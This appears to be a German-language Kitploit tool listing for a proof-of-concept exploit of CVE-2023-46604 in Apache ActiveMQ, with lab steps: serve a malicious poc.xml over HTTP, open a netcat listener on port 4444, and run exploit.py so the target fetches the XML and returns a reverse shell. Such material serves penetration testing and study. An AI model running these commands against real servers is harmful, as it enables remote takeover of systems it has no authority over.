Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46604 — PoC-Exploit für CVE-2023-46604, der Apache ActiveMQ angreift und eine Reverse-Shell über einen manipulierten XML-Payload per HTTP übermittelt. | Kitploit
Tools/GitHubGitHub/cuanh2333/cve-2023-46604
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubcuanh2333/cve-2023-46604

CVE-2023-46604

PoC-Exploit für CVE-2023-46604, der Apache ActiveMQ angreift und eine Reverse-Shell über einen manipulierten XML-Payload per HTTP übermittelt.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-46604

image

Docker-Compose mit zwei Images aufbauen, bestehend aus Opfer- und Zielrechner gemäß der geforderten Umgebung
Auf dem Opferrechner ActiveMQ starten

Zum Angreiferrechner wechseln: • Öffne den HTTP-Dienst, um den PoC zu senden: python3 -m http.server

• Verwende Netcat, um auf eine Verbindung zum Angreiferrechner zu lauschen: nc -nlvp 4444

• Sende das Payload, um eine Reverse-Shell zum Angreiferrechner herzustellen: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Dabei:

  • Exploit.py: Code-Datei, die die Schwachstelle ausnutzt
  • -i 172.18.0.3: IP-Adresse des Rechners, der das Payload sendet
  • -p 61616: Port, auf dem ActiveMQ des Opferrechners lauscht
  • --xml http://172.18.0.2:8000/poc.xml: URL-Adresse der poc.xml-Datei auf dem Angreiferrechner

Man kann sehen, dass nach dem Aufruf des Befehls zum Ausführen der Datei „exploit.py“ der Exploit ein Paket „poc.xml“ auf dem Webserver an das Ziel sendet, nämlich die Adresse des ActiveMQ-Dienstes, der auf dem Zielserver läuft. Gleichzeitig erhält der HTTP-Webserver auf dem Angreiferrechner eine Anfrage von der IP-Adresse des Zielrechners.

Nachdem das Payload gesendet wurde, wechsle zum Terminal, das auf Port 4444 des Angreiferrechners lauscht. Man sieht, dass die Reverse-Shell des Opferrechners zurückgesendet wurde.

Tool herunterladen